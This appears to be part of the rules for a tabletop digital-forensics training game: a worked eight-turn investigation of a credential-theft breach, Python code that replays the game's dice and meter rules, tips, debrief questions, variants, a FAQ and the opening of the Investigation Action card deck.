Investigation Inconclusive (FAILURE)

Blue Team fails if, at the turn limit, no victory condition is met.

Precedence (v2.2): Victory conditions are always checked FIRST. There is no "any meter < 40% = failure" clause (deleted — it conflicted with Victory Condition 3), and budget exhaustion is not a loss: you may always fall back on the cheap 5-Budget actions while Budget lasts, and the game simply plays out to the turn limit.

Result of failure: "Investigation stalled. Too many unanswered questions. Threat actor remains unidentified. Forensic team recommends additional investigation by external firm."

Consequence of Failure:
  - Investigation results are incomplete and cannot feed into the Hardening or Network Building modules
  - The Audit & Compliance module must assess security posture with incomplete information
  - The organization loses confidence in its threat intelligence


Example Investigation (Complete Turn)

Scenario Setup (TO Secret)

TIER 2 attack: Credential-based lateral movement with persistence
Turn limit: 8 turns (TIER 2 baseline 9, d4 roll of -1)
Attacker profile: Eastern European cybercriminal group
Key technique: Password spray → Privilege escalation → Scheduled task persistence → Data exfiltration
Bonus: The sysadmin's initial triage captured a suspicious binary, so a malware sample is available from turn 1

Turn 1

Blue Team: "We'll start with event log analysis of the compromised database server. We want to see the login history and identify unusual access patterns. We'll export the logs with their digital signatures and hash the export."

Investigator Skill: IT Security background (+1)

TO Facilitator:
  1. Check Cost: LOG-01 costs 5 Budget. Current budget 75. ✓ OK
  2. Check Duration: LOG-01 is Duration 1 — resolves this turn
  3. Set DC: LOG-01 has DC 11. No anti-forensics. DC = 11
  4. Apply Modifiers: +1 (IT security background) + 0 (no prior clues) = +1 total
  5. Roll: Investigator rolls d20+1. d20 = 13, total 14
  6. Success! (14 ≥ 11) → Discover Evidence card EVD-04 "Suspicious Admin Login (Timeline)" — apply ONLY its printed impacts (v2.2 No Double Counting)

Update Tracking:
  - Budget: 75 - 5 = 70 remaining
  - Turn: 1 → 2
  - EVD-04 printed impacts: Timeline 0% → 25%, Attack Chain 0% → 20%, Attribution 0% → 10%
  - Chain of Custody: 0% → 5% (v2.2: preservation stated — signed log export, hashed)
  - Evidence Log: "EVD-04 - discovered via LOG-01 - preserved via signed/hashed export - Chain of Custody: intact"

Blue Team Deduction: "Looks like an admin account was accessed from unusual locations. Might be credential theft."


Turn 2

Blue Team: "Let's analyze that malware sample from triage. We want to understand what it does and where it connects to."

Investigator Skill: Forensic certification background (+2)

TO Facilitator:
  1. Check Cost: MALW-01 costs 15 Budget. Current budget 70. ✓ OK
  2. Check Duration (v2.2): MALW-01 is Duration 2. Starting the sandbox run is this turn's action; the roll and results arrive at the START of turn 3. MALW-01 is now the one multi-turn investigation in flight.

Update Tracking:
  - Budget: 70 - 15 = 55 remaining
  - Turn: 2 → 3
  - Meters: unchanged (results pending) — Timeline 25%, Attack Chain 20%, Attribution 10%, Chain of Custody 5%


Turn 3

Start of turn — MALW-01 resolves (v2.2 Duration):
  1. Set DC: MALW-01 has DC 12. Attacker was moderately sophisticated: +1. DC = 13
  2. Apply Modifiers: +2 (forensic cert)
  3. Roll: d20 = 14, total 16
  4. Success! (16 ≥ 13) → Discover EVD-02 "Command-and-Control Callback Domain"
     - EVD-02 printed impacts: Attack Chain 20% → 35%, Attribution 10% → 35%, Timeline 25% → 30%
     - Chain of Custody: 5% → 10% (v2.2: sample hashed, sandbox logs archived)

Turn 3 action — Blue Team: "Now let's look at network flow records for that C2 domain. Start NET-01."

TO Facilitator: NET-01 costs 10 (budget 55 → 45 ✓), Duration 2 — resolves at the start of turn 4. (Allowed: MALW-01 finished this turn, so only one investigation is in flight.)

Update Tracking:
  - Budget: 45 remaining
  - Turn: 3 → 4
  - Meters: Timeline 30%, Attack Chain 35%, Attribution 35%, Chain of Custody 10%

Blue Team Deduction: "The malware communicates with an external server. That's how the attacker stays in control."


Turn 4

Start of turn — NET-01 resolves (v2.2 Duration):
  1. Set DC: NET-01 has DC 12
  2. Apply Modifiers: +1 (IT security background)
  3. Roll: d20 = 9, total 10
  4. Partial Success (10 is in the DC-2 to DC-1 band, 10-11) → Suspicious outbound traffic found, but the destination is unclear. No Evidence card produced, so apply NET-01's partial advance line: Attack Chain 35% → 45%, Attribution 35% → 40%. No Chain of Custody handling bonus (no Evidence card discovered).

Turn 4 action — Blue Team: "Let's try to reconstruct the timeline from what we have. TIMELINE-01."

TO Facilitator: TIMELINE-01 costs 5 (budget 45 → 40 ✓), Duration 1 — resolves now. DC 13, +2 (DFIR training). Roll: d20 = 8, total 10. Failure (10 < 11, below the DC-2 partial band). Too many timestamp gaps. Budget still spent.

Update Tracking:
  - Budget: 40 remaining
  - Turn: 4 → 5
  - Meters: Timeline 30%, Attack Chain 45%, Attribution 40%, Chain of Custody 10%


Turn 5 (Critical Decision)

Blue Team: "This is expensive, but let's start the Memory Forensics Deep Dive on the admin workstation. If the attacker has malware in memory, we might find encryption keys or recent commands that show their intent."

TO Facilitator:
  1. Check Cost: MEM-02 costs 20 Budget. Current budget 40. ✓ OK
  2. Check Duration (v2.2): MEM-02 is Duration 3 — started this turn (turn 1 of 3), it resolves at the START of turn 7. It is now the one multi-turn investigation in flight.

Update Tracking:
  - Budget: 40 - 20 = 20 remaining
  - Turn: 5 → 6
  - Meters: unchanged (results pending)


Turn 6 (Working While Waiting)

Blue Team: "While the memory analysis runs, let's Analyze our existing evidence. The suspicious admin login (EVD-04, T1078 Valid Accounts) lines up with the C2 callbacks (EVD-02, T1071 Application Layer Protocol): the login happened 20 minutes before the first beacon. This was credential theft followed by remote control."

TO Facilitator:
  1. Check Cost: Analyze Existing Evidence costs 5 (v2.2). Budget 20 → 15 ✓. (Allowed while MEM-02 is in flight — Analyze is not an investigation.)
  2. Check cards: EVD-04 and EVD-02 have not been Analyzed before ✓ — mark both as Analyzed (v2.2: each Evidence card only once)
  3. Modifiers: +1 (references specific MITRE ATT&CK techniques) + 1 (IT security background) = +2
  4. Roll: d20 = 12, total 14 vs. DC 10. Success! → Advance two meters by 10% each: Timeline 30% → 40%, Attribution 40% → 50%

Update Tracking:
  - Budget: 15 remaining
  - Turn: 6 → 7
  - Meters: Timeline 40%, Attack Chain 45%, Attribution 50%, Chain of Custody 10%

Blue Team Deduction: "Credential theft, then hands-on-keyboard control. Now we need the memory results."


Turn 7 (Breakthrough)

Start of turn — MEM-02 resolves (v2.2 Duration, started turn 5):
  1. Set DC: MEM-02 has DC 15
  2. Apply Modifiers: +2 (forensic analyst) + 1 (MALW-01 already completed) = +3
  3. Roll: d20 = 11, total 14
  4. Partial Success (14 is in the DC-2 to DC-1 band, 13-14) → Discover ONE complete Evidence card, EVD-09 "Attacker Command History", plus an INCOMPLETE second finding (fragments of an RC4 key — marked INCOMPLETE, no meter impact until completed or interpreted). Because a complete Evidence card was produced, apply ONLY its printed impacts (v2.2 No Double Counting); MEM-02's own partial advance line is not added on top.
     - EVD-09 printed impacts: Timeline 40% → 65%, Attack Chain 45% → 70%, Attribution 50% → 65%, Chain of Custody 10% → 20%
     - Chain of Custody: 20% → 25% (v2.2: memory image hashed, extraction methodology documented)

Turn 7 action — Blue Team: "Follow the investigative lead on EVD-02: WHOIS and ASN lookup on the C2 domain to map related attacker infrastructure."

TO Facilitator:
  1. Check Cost: Follow Investigative Lead costs 5 (v2.2). Budget 15 → 10 ✓
  2. Set DC: 12
  3. Apply Modifiers: +2 (detailed approach referencing prior evidence)
  4. Roll: d20 = 14, total 16. Success! → Discover EVD-07 "Attacker Infrastructure Map" — apply its printed impacts (v2.2: no separate +20% Attribution bonus — No Double Counting)
     - EVD-07 printed impacts: Attribution 65% → 95%, Attack Chain 70% → 85%, Timeline 65% → 75%
     - Chain of Custody: 25% → 30% (v2.2: WHOIS records and passive-DNS exports archived)

Update Tracking:
  - Budget: 10 remaining
  - Turn: 7 → 8 of 8 (final turn)
  - Meters: Timeline 75%, Attack Chain 85%, Attribution 95%, Chain of Custody 30%

Victory check: Condition 1 needs Attribution ≥ 90% ✓ (95%) AND Timeline ≥ 80% ✗ (75%). Not yet. Condition 2 needs Timeline ≥ 80% ✗. Play on.


Turn 8 (Final Turn)

Blue Team: "One more push on the timeline. We retry TIMELINE-01, now synthesizing the login timeline (EVD-04), the C2 beacons (EVD-02), and the attacker's command history (EVD-09)."

TO Facilitator:
  1. Check Cost: TIMELINE-01 costs 5. Budget 10 → 5 ✓. Duration 1 — resolves now.
  2. Set DC: 13
  3. Apply Modifiers: +2 (DFIR training) + 1 (prior investigations provide clues) = +3
  4. Roll: d20 = 15, total 18. Success! All timeline-type evidence has already been discovered, so no new Evidence card is produced — apply TIMELINE-01's own advance line instead (v2.2 No Double Counting): Timeline 75% → 100%, Attack Chain 85% → 100%

Update Tracking:
  - Budget: 5 remaining
  - Turn: 8 of 8 — game end
  - Final meters: Timeline 100%, Attack Chain 100%, Attribution 95%, Chain of Custody 30%


Victory Determination (Game End, After Turn 8)

Check Victory Conditions (v2.2 — victory is checked first, never overridden by a low meter):

Condition 1 "Full Attribution": Attribution ≥ 90% AND Timeline ≥ 80%?
  - Attribution: 95% ✓
  - Timeline: 100% ✓
  - YES! VICTORY CONDITION 1 MET!

(For completeness: Condition 2 "Solid Case" fails on Chain of Custody 30% < 70%; Condition 3 "Partial Findings" would also be met with three meters ≥ 70% at game end. Note the v2.2 precedence rule: Chain of Custody sitting at 30% does NOT cause a failure — the old "any meter < 40%" clause is deleted. Meter averages are never used.)

Game Ends with VICTORY

Investigation Result: "Your forensic investigation successfully identified the attacker as a member of the [Eastern European Cybercriminal Group]. Key findings:
  - Attack vector: Credential theft via password spray
  - Control: C2 beaconing from checkupdate-style domains, hands-on-keyboard commands recovered from memory
  - Timeline: fully reconstructed from signed logs, beacon timing, and command history
  - Attribution: 95% confidence linked to known group via infrastructure map
  - Caveat: evidence admissibility is weak (Chain of Custody 30%) — fine for hardening, not for court

Recommendations:
  1. Implement multi-factor authentication on admin accounts
  2. Deploy an EDR solution to detect persistence mechanisms
  3. Implement network segmentation to limit lateral movement
  4. Increase logging and monitoring of admin activities

This investigation will inform the Hardening, Network Building, and Audit modules going forward."
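The turn sequence and the worked example above are easier to check with the rules written down as code. The Python rules engine below is an added example, not RetroVerse Studios' code: it encodes the DC bands, the Duration scheduling, the one-investigation-in-flight limit, Analyze-once, No Double Counting, the +5% Chain of Custody handling bonus and the victory precedence, then replays the eight turns above with the example's own rolls, modifiers and printed meter impacts. Two conventions are this example's own: a FOLLOW-LEAD pseudo-card standing in for Follow Investigative Lead (cost 5, DC 12 as the TO set it in turn 7), and the spec dictionary passed with each action (roll, modifier, optional dc_adjust, optional evidence with its impacts and a preserved flag, plus the card's advance and partial_advance lines).

```python
"""Rules engine for the Forensics turn sequence (v2.2), replaying the Example Investigation.
Added example, not RetroVerse Studios' code; card stats are from the quick-reference table."""
from dataclasses import dataclass, field
CARDS = {  # (DC, Budget cost, Duration); FOLLOW-LEAD stands in for Follow Investigative Lead
    "LOG-01": (11, 5, 1), "MALW-01": (12, 15, 2), "NET-01": (12, 10, 2),
    "TIMELINE-01": (13, 5, 1), "MEM-02": (15, 20, 3), "FOLLOW-LEAD": (12, 5, 1)}

def outcome(roll, modifier, dc):  # success at >= DC, partial in the DC-2 to DC-1 band, failure below
    total = roll + modifier
    return "success" if total >= dc else "partial" if total >= dc - 2 else "failure"

def victory(m, game_end):
    """V1, V2, then V3 in order; V3 only at the turn limit. No meter-minimum failure clause."""
    if m["attribution"] >= 90 and m["timeline"] >= 80:
        return "V1 Full Attribution"
    if m["timeline"] >= 80 and m["attack_chain"] >= 80 and m["custody"] >= 70:
        return "V2 Solid Case"
    return "V3 Partial Findings" if game_end and sum(v >= 70 for v in m.values()) >= 2 else None

@dataclass
class Game:
    max_turns: int
    budget: int = 75
    turn: int = 1
    meters: dict = field(default_factory=lambda: dict(timeline=0, attack_chain=0, attribution=0, custody=0))
    pending: tuple = None  # (resolve_turn, dc, spec): the one multi-turn investigation in flight
    analyzed: set = field(default_factory=set)

    def _pay(self, cost):
        if cost > self.budget:
            raise ValueError("insufficient Budget; choose a cheaper action")
        self.budget -= cost

    def _advance(self, impacts):
        for meter, delta in impacts.items():
            self.meters[meter] = min(100, self.meters[meter] + delta)

    def _resolve(self, dc, spec):
        result = outcome(spec["roll"], spec["modifier"], dc)
        evidence = spec.get("evidence")
        if result == "failure":
            return result  # Budget already spent; nothing else happens
        if evidence:  # No Double Counting: printed Evidence impacts replace the card's advance line
            self._advance(evidence["impacts"])
            if evidence.get("preserved"):  # preservation stated: hash, image, log export
                self._advance({"custody": 5})
        else:
            self._advance(spec.get("advance" if result == "success" else "partial_advance", {}))
        return result

    def begin_turn(self):  # a Duration 2-3 investigation completing now rolls and resolves
        if self.pending and self.pending[0] == self.turn:
            _, dc, spec = self.pending
            self.pending = None
            self._resolve(dc, spec)

    def investigate(self, card, spec):
        if self.pending:
            raise ValueError("only one multi-turn investigation may be in flight")
        dc, cost, duration = CARDS[card]
        dc += spec.get("dc_adjust", 0)  # anti-forensics +2, sophisticated attacker +1-2
        self._pay(cost)
        if duration == 1:
            return self._resolve(dc, spec)
        self.pending = (self.turn + duration - 1, dc, spec)  # this turn counts as turn 1 of N
        return "pending"

    def analyze(self, cards, roll, modifier, impacts):  # fixed DC 10; two meters, +5-10% each
        if self.analyzed & set(cards):
            raise ValueError("each Evidence card can be Analyzed only once")
        self._pay(5)
        self.analyzed |= set(cards)
        if roll + modifier >= 10:
            self._advance(impacts)
            return "success"
        return "failure"

    def end_turn(self):  # Step 3 victory check; past the turn limit, V3 is in play too
        self.turn += 1
        return victory(self.meters, self.turn > self.max_turns)

def replay_example():
    """Replays the TIER 2, 8-turn example; returns (game, result after turn 8)."""
    ev = lambda **impacts: dict(impacts=impacts, preserved=True)  # preservation was stated each time
    g = Game(max_turns=8)
    turns = [  # one Blue Team action per turn; arrivals resolve in begin_turn()
        lambda: g.investigate("LOG-01", dict(roll=13, modifier=1, evidence=ev(timeline=25, attack_chain=20, attribution=10))),
        lambda: g.investigate("MALW-01", dict(roll=14, modifier=2, dc_adjust=1, evidence=ev(attack_chain=15, attribution=25, timeline=5))),
        lambda: g.investigate("NET-01", dict(roll=9, modifier=1, partial_advance=dict(attack_chain=10, attribution=5))),
        lambda: g.investigate("TIMELINE-01", dict(roll=8, modifier=2)),  # 8 + 2 = 10 < 11: failure
        lambda: g.investigate("MEM-02", dict(roll=11, modifier=3, evidence=ev(timeline=25, attack_chain=25, attribution=15, custody=10))),
        lambda: g.analyze({"EVD-04", "EVD-02"}, roll=12, modifier=2, impacts=dict(timeline=10, attribution=10)),
        lambda: g.investigate("FOLLOW-LEAD", dict(roll=14, modifier=2, evidence=ev(attribution=30, attack_chain=15, timeline=10))),
        lambda: g.investigate("TIMELINE-01", dict(roll=15, modifier=3, advance=dict(timeline=25, attack_chain=15))),
    ]
    for action in turns:
        g.begin_turn()
        action()
        result = g.end_turn()
    return g, result
```

replay_example() ends with Budget 5, Timeline 100%, Attack Chain 100%, Attribution 95%, Chain of Custody 30% and Victory Condition 1, matching the tracking lines above. The in-flight and Analyze-once checks raise ValueError, so a mis-sequenced replay (for instance starting NET-01 on turn 2 while MALW-01 is still running) fails loudly instead of silently drifting from the rules.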


Tips for Investigators

Investigation Strategy

Early Game (Turns 1-3):
  - Start with cheaper, lower-DC investigations (Log Analysis, Timeline Reconstruction)
  - Build a foundation of knowledge before attempting expensive techniques
  - Goal: 50%+ progress on any meter by turn 3

Mid Game (Turns 4-7):
  - Use findings from early investigations to guide more expensive deep dives
  - Follow Investigative Leads to get "bang for your budget"
  - Aim for 75%+ on at least two meters by turn 6

Late Game (Turns 8+):
  - If you have momentum, push for one complete meter (≥90%)
  - If budget is tight, focus on two meters reaching ≥70% (Condition 3)
  - Make bold investigations; you have less to lose

Narrative Details Matter

To Gain Bonuses:
  - Explain not just WHAT you'll investigate, but HOW and WHY
  - Reference specific evidence already discovered
  - Mention the MITRE ATT&CK techniques you're looking for
  - Example (gains +2): "We found a persistence mechanism in the scheduled tasks. This matches T1053 (Scheduled Task/Job). Let's do Memory Forensics to find if the malware is still resident in RAM and tracking recent C2 communications."

Evidence Correlation

Create Connections:
  - Note which investigations led to which Evidence cards
  - Look for patterns: "All malware samples have Russian-language strings"
  - Timeline building: "Login at 2:10, C2 connection at 2:15, exfiltration at 2:25"
  - These connections feed the Analyze Evidence action and drive attribution forward


Tips for the Threat Orchestrator

Maintaining Suspense

Pacing the Game

Challenge Scaling

For Beginner Investigators:
  - Use TIER 1 attacks (6-8 turns, low DC, no anti-forensics)
  - Provide hints during the briefing ("We recovered a memory dump")
  - Allow retries on failed Investigation Actions

For Experienced Investigators:
  - Use TIER 3-4 attacks (11-15 turns, high DC, sophisticated anti-forensics)
  - Limit Budget more strictly
  - Add False Evidence cards (a partial investigation leads to a wrong conclusion)


Debrief & Learning Outcomes

Post-Game Discussion (10-15 minutes)

After game concludes, facilitate discussion:

On Investigation Process:
  1. Which investigation technique was most valuable? Why?
  2. What would you do differently with more budget?
  3. What evidence was hardest to interpret?
  4. How did you decide which investigation to do next?

On Attack Reconstruction:
  1. Walk through the attack chain step-by-step. What happened first? Last?
  2. How did the attacker maintain access without being detected immediately?
  3. What's one technique that could have prevented this entire attack?

On Attribution:
  1. What evidence pointed to the attacker's identity?
  2. How confident are you in the attribution? (At 75%? 90%?)
  3. What additional evidence would make you 95%+ confident?

On Real-World Forensics:
  1. How does this compare to actual forensic investigations you've studied?
  2. What tools mentioned in the game (memory forensics, malware analysis) are used in real incident response?
  3. Why does attribution matter? (Law enforcement, threat intelligence sharing, policy response)

On Lessons Learned:
  1. What control from the Hardening module could have detected this attack early?
  2. How would Network Building architecture limit lateral movement?
  3. What Audit & Compliance questions need to be answered?


Standalone Forensics Variants

Variant 1: Time-Pressure Mode

Modified Rules: Reduce the tier's turn count by 3 (a TIER 1 game becomes 3-5 turns, a TIER 2 game 5-7, and so on)

Effect: Creates higher stakes; investigators must make faster decisions; less time for methodical analysis

When to Use: Advanced investigators who want more challenge; time-limited classroom sessions


Variant 2: False Evidence Mode

Modified Rules: TO secretly includes 1-2 "False Evidence" cards that appear legitimate but are actually red herrings

Effect: Attribution becomes harder; investigators must corroborate findings; critical thinking required

Example: Malware sample analysis reveals Russian-language strings → seems like Eastern European group. But it was actually planted by another threat group to frame competitors.

When to Use: Teaching about false positives and need for corroboration


Variant 3: Cold Case Mode

Modified Rules: Start with 40% progress already on one or two meters (from prior investigation by another team)

Effect: Investigators build on existing findings rather than starting from scratch

When to Use: Teaching how investigations are handed off; continuing previous work


Variant 4: Competitive Mode

Modified Rules: Two teams of investigators compete to achieve highest progress on most meters

Scoring: +3 points per meter ≥ 90%, +2 points per meter 70-89%, +1 per meter 40-69%

When to Use: Competitive classroom tournament; multiple teams investigating same breach simultaneously


Recommended Module Sequences with Forensics

30-minute Warm-up: Forensics solo (TIER 1, 6-turn simplified scenario)

90-minute Session: Incident Response (45 min) + Forensics (45 min)
  - Phase 1: IR team detects the attack chain
  - Phase 2: Forensics team investigates the findings

120-minute Session: Incident Response → Disaster Recovery mini → Forensics
  - Phase 1: IR failure (breach not contained)
  - Phase 2: DR (crisis management, brief)
  - Phase 3: Forensics (investigation & attribution)

180+ minute Session: Complete lifecycle with Forensics
  - Network Building (45 min) → Hardening (45 min) → Incident Response (45 min) → Forensics (30 min)


Quick Reference Card for Investigators

Setup: Choose TIER (1-4), roll d4, announce the turn count and starting budget (75)

Each Turn:
  1. Resolve arrivals (v2.2): Any Duration 2-3 investigation completing this turn rolls and resolves at the start of the turn
  2. Choose action: Conduct Investigation (card cost, Duration 1-3), Analyze Evidence (5 Budget, each Evidence card only once), or Follow Lead (5 Budget)
  3. Pay cost: Deduct Budget
  4. Roll d20: Add skill modifier, compare to DC (partial success on DC-2 to DC-1); Duration 2-3 investigations roll when they complete
  5. Resolve: Discover evidence (apply the Evidence card's printed impacts — never also the investigation card's advance line), or fail
  6. Update: Budget, Turn counter, Progress Meters (+5% Chain of Custody per Evidence discovery with stated preservation)

Resources:
  - Budget: 75 (represents forensic lab time; tracker range 0-100)
  - Turns: 6-15 from the tier, adjusted by -1/0/+1 from the d4 roll
  - Progress Meters: Timeline, Attack Chain, Attribution, Chain of Custody (each 0-100%)

Victory (v2.2):
  - V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
  - V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
  - V3 "Partial Findings": any two meters ≥70% at game end

Failure (v2.2): At the turn limit, no victory condition is met. Victory is checked first — there is no meter-minimum failure clause, and budget exhaustion is not a loss.


Forensics Card Deck Checklist

Before playing, ensure you have:


Frequently Asked Questions

Q: Can I play Forensics if I've never played Incident Response? A: Yes! Forensics standalone is completely self-contained. You don't need to have played IR, Hardening, or any other module first.

Q: How long does Forensics take? A: Typically 45-90 minutes depending on group experience level and decision speed. Experienced investigators finish faster.

Q: Can I play Forensics with a large group? A: Yes, but keep each team to the recommended 1-4 investigators. With more people, split into two teams, each with its own TO. You can even use Competitive Mode, where both teams investigate the same breach.

Q: What if investigators want to know the tier? A: Don't tell them. Part of the game is discovering how sophisticated the attacker is through evidence analysis. Let them discover it.

Q: What if we run out of budget before solving the case? A: That's a realistic outcome, and it is NOT an automatic loss (v2.2). Keep playing to the turn limit — the cheap 5-Budget actions (Analyze Evidence, Follow Lead, LOG-01, TIMELINE-01) stretch a thin budget, and at game end you check victory normally. If any two meters are ≥70% at game end, you win via Condition 3 (like real-world investigations with incomplete findings). If no condition is met at the turn limit, the investigation is inconclusive.

Q: Can we retry a failed investigation? A: You can attempt the same investigation again next turn (costs full budget again), but you still don't know if you'll succeed. You're essentially re-investigating the same evidence looking for something you missed.


Printable Components

All printable cards are available in:
- cards/forensics/core-deck/investigation-cards.md — 12 Investigation Action cards
- cards/forensics/core-deck/evidence-cards.md — 12 Evidence cards + 4 Findings cards (Findings section)

Progress Meter Tracker: print templates coming in the print pack. Until then, draw a simple 4-meter tracker on paper: four rows labeled Timeline Completeness, Attack Chain Reconstruction, Attribution Confidence, and Evidence Chain of Custody, each marked 0-100% in 5% steps, plus a Turn row and a Budget row (0-100).


Ready to investigate? Print your cards, gather 1-4 forensic analysts, and begin your investigation. Good luck!

cards/forensics/core-deck/investigation-cards.md

Forensics Module: Investigation Action Cards (Core Deck)

Version: 2.2 - Playtest Edition
Card Count: 12 Investigation Action Cards
Printable: Yes (see printing instructions below)


Overview

Investigation Action cards represent specific forensic analysis techniques that investigators can deploy to discover evidence about the attack. Each card has a Difficulty Class (DC) that represents the skill required to successfully complete the investigation, a Cost in Budget, and a Duration showing how many turns the investigation takes.

Duration rule (v2.2): Starting an investigation with Duration N occupies your action (and its Budget cost) on the turn you start it. Counting that turn as turn 1, the roll is made and the results arrive at the START of turn N — so Duration 1 resolves immediately, Duration 2 at the start of the next turn, Duration 3 two turns after starting. Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting.

No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts (plus the +5% Chain of Custody handling bonus for stating how it was preserved). The "Advance" line in each card's SUCCESS block applies only when no Evidence card is produced (e.g., no suitable undiscovered Evidence remains); partial-success advance lines apply as printed.
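As an added worked example (not part of the game files), the following Python resolver applies the rules above: the d20-plus-modifiers roll against DC with the PARTIAL SUCCESS band at DC-2 to DC-1, the Duration rule, No Double Counting with the +5% Chain of Custody handling bonus, and the three v2.2 victory conditions from the standalone guide. Card values are DISK-01 and LOG-01 as printed; the Evidence card meter impacts passed to `resolve()` are constructed for the example.

```python
"""Added example, not part of the game files: a resolver for the v2.2
Investigation Action rules. Card values are DISK-01 and LOG-01 as
printed on this page; Evidence card meter impacts are constructed."""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

METERS = ("timeline", "attack_chain", "attribution", "custody")


@dataclass
class ActionCard:
    card_id: str
    dc: int
    cost: int
    duration: int
    advance: Dict[str, int]          # SUCCESS "Advance" line (no Evidence card)
    partial_advance: Dict[str, int]  # PARTIAL SUCCESS advance, applied as printed
    rush_cost: Optional[int] = None  # extra Budget to reduce Duration to 1


# Values as printed on the DISK-01 and LOG-01 cards.
DISK_01 = ActionCard("DISK-01", 12, 10, 2,
                     {"timeline": 10, "attack_chain": 15},
                     {"timeline": 5, "attack_chain": 5}, rush_cost=5)
LOG_01 = ActionCard("LOG-01", 11, 5, 1,
                    {"timeline": 15, "attack_chain": 10},
                    {"timeline": 5, "attack_chain": 5})


def outcome(roll: int, modifiers: int, dc: int) -> str:
    """d20 + skill modifiers vs DC; the PARTIAL SUCCESS band is DC-2..DC-1."""
    total = roll + modifiers
    if total >= dc:
        return "success"
    if total >= dc - 2:
        return "partial"
    return "failure"


def resolve_turn(start_turn: int, duration: int) -> int:
    """Duration rule: the starting turn counts as turn 1, so results arrive
    at the START of start_turn + duration - 1 (Duration 1 = immediately)."""
    return start_turn + duration - 1


@dataclass
class Investigation:
    meters: Dict[str, int] = field(default_factory=lambda: {m: 0 for m in METERS})
    budget: int = 100
    in_flight: Optional[Tuple[ActionCard, int, int]] = None  # (card, due, mods)

    def _advance(self, impacts: Dict[str, int]) -> None:
        for meter, pct in impacts.items():
            self.meters[meter] = min(100, self.meters[meter] + pct)

    def start(self, card: ActionCard, turn: int, modifiers: int = 0,
              rush: bool = False) -> int:
        """Spend the action and Budget now; return the turn the roll resolves."""
        if self.in_flight is not None:
            raise RuntimeError("only one investigation may be in flight")
        if rush and card.rush_cost is None:
            raise ValueError(f"{card.card_id} has no rush option")
        cost = card.cost + (card.rush_cost if rush else 0)
        if cost > self.budget:
            raise RuntimeError("insufficient Budget")
        self.budget -= cost
        due = resolve_turn(turn, 1 if rush else card.duration)
        self.in_flight = (card, due, modifiers)
        return due

    def resolve(self, turn: int, roll: int,
                evidence_impacts: Optional[Dict[str, int]] = None,
                handling_stated: bool = False) -> Optional[str]:
        """Roll at the start of the due turn. Returns None if not yet due."""
        if self.in_flight is None:
            raise RuntimeError("nothing to resolve")
        card, due, mods = self.in_flight
        if turn < due:
            return None
        self.in_flight = None
        result = outcome(roll, mods, card.dc)
        if result == "success":
            if evidence_impacts:
                # No Double Counting: only the Evidence card's printed impacts,
                # plus +5% Chain of Custody for stating how it was preserved.
                self._advance(evidence_impacts)
                if handling_stated:
                    self._advance({"custody": 5})
            else:
                self._advance(card.advance)
        elif result == "partial":
            self._advance(card.partial_advance)
        # failure: Budget was already spent at start(); no meter change
        return result


def victory(meters: Dict[str, int]) -> Optional[str]:
    """v2.2 victory conditions, checked in order V1, V2, V3."""
    if meters["attribution"] >= 90 and meters["timeline"] >= 80:
        return "V1 Full Attribution"
    if (meters["timeline"] >= 80 and meters["attack_chain"] >= 80
            and meters["custody"] >= 70):
        return "V2 Solid Case"
    if sum(v >= 70 for v in meters.values()) >= 2:
        return "V3 Partial Findings"
    return None
```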


Card Structure

Each Investigation Action Card includes:
- Card ID: Unique identifier (DISK-01, MEM-01, LOG-01, etc.)
- Title: Name of investigation technique
- MITRE ATT&CK: Referenced technique(s) this investigation detects
- Difficulty Class (DC): Roll d20+modifiers vs. this to succeed (typically 11-15)
- Cost: Budget units required
- Duration: Number of turns investigation takes
- Description: What the investigation does and what evidence it reveals
- Success Conditions: What happens on success, partial success, or failure
- Chain of Custody Notes: Any admissibility or documentation concerns


Card Details

DISK-01: Disk Image & Analysis

╔════════════════════════════════════════════════════════════════╗
║              DISK-01: DISK IMAGE & ANALYSIS                    ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Forensic Disk Imaging & Analysis                    ║
║ MITRE ATT&CK: T1005 (Data from Local System), T1025 (Data from ║
║              Removable Media)                                  ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12                                           ║
║ Budget Cost: 10                                                ║
║ Duration: 2 turns (v2.2 rush: pay +5 Budget for Duration 1)    ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Create a bit-for-bit disk image of the compromised system,     ║
║ then examine file system artifacts, deleted files, and         ║
║ hidden data. This is a foundational forensic technique.        ║
║                                                                 ║
║ What You're Looking For:                                       ║
║ - Malware files (executables, scripts, libraries)              ║
║ - Deleted files (file carving reveals overwritten data)        ║
║ - Persistence mechanisms (startup folders, registry runs)      ║
║ - Downloaded files (browser cache, temp directories)           ║
║ - Suspicious file timestamps (backdating, mismatches)          ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12):                                        ║
║ Discover ONE Evidence card from: Malware Sample, Persistence   ║
║ Mechanism, or Downloaded Malware evidence set.                 ║
║ Advance (only if no Evidence card produced):                   ║
║ Timeline Completeness +10%, Attack Chain +15%                  ║
║                                                                 ║
║ PARTIAL SUCCESS (roll DC-2 to DC-1 = 10-11):                   ║
║ Discover INCOMPLETE Evidence card (partial findings).          ║
║ Advance: Timeline Completeness +5%, Attack Chain +5%           ║
║                                                                 ║
║ FAILURE (roll < 10):                                           ║
║ No evidence discovered. Budget still spent; turn consumed.     ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY:                                              ║
║ Disk image must be bit-for-bit copy. Chain of custody:         ║
║ Strong - Imaging is gold standard in forensics.                ║
║ ✓ All evidence from this source is admissible in court         ║
║                                                                 ║
║ SKILL MODIFIERS:                                               ║
║ +2 if investigator has formal GCIH/GCFE training               ║
║ +1 if investigator has IT administration background            ║
║ +1 if team provides detailed explanation of imaging process    ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES:                                                         ║
║ • Disk imaging is time-consuming (hence 2-turn Duration)       ║
║ • Can be combined with DISK-02 for deeper analysis             ║
║ • Foundation for all disk-based forensic work                  ║
║ • Works best on traditional disk systems (less effective on    ║
║   SSDs with wear-leveling and TRIM commands)                   ║
╚════════════════════════════════════════════════════════════════╝

DISK-02: File System Carving

╔════════════════════════════════════════════════════════════════╗
║              DISK-02: FILE SYSTEM CARVING                      ║
╠════════════════════════════════════════════════════════════════╣
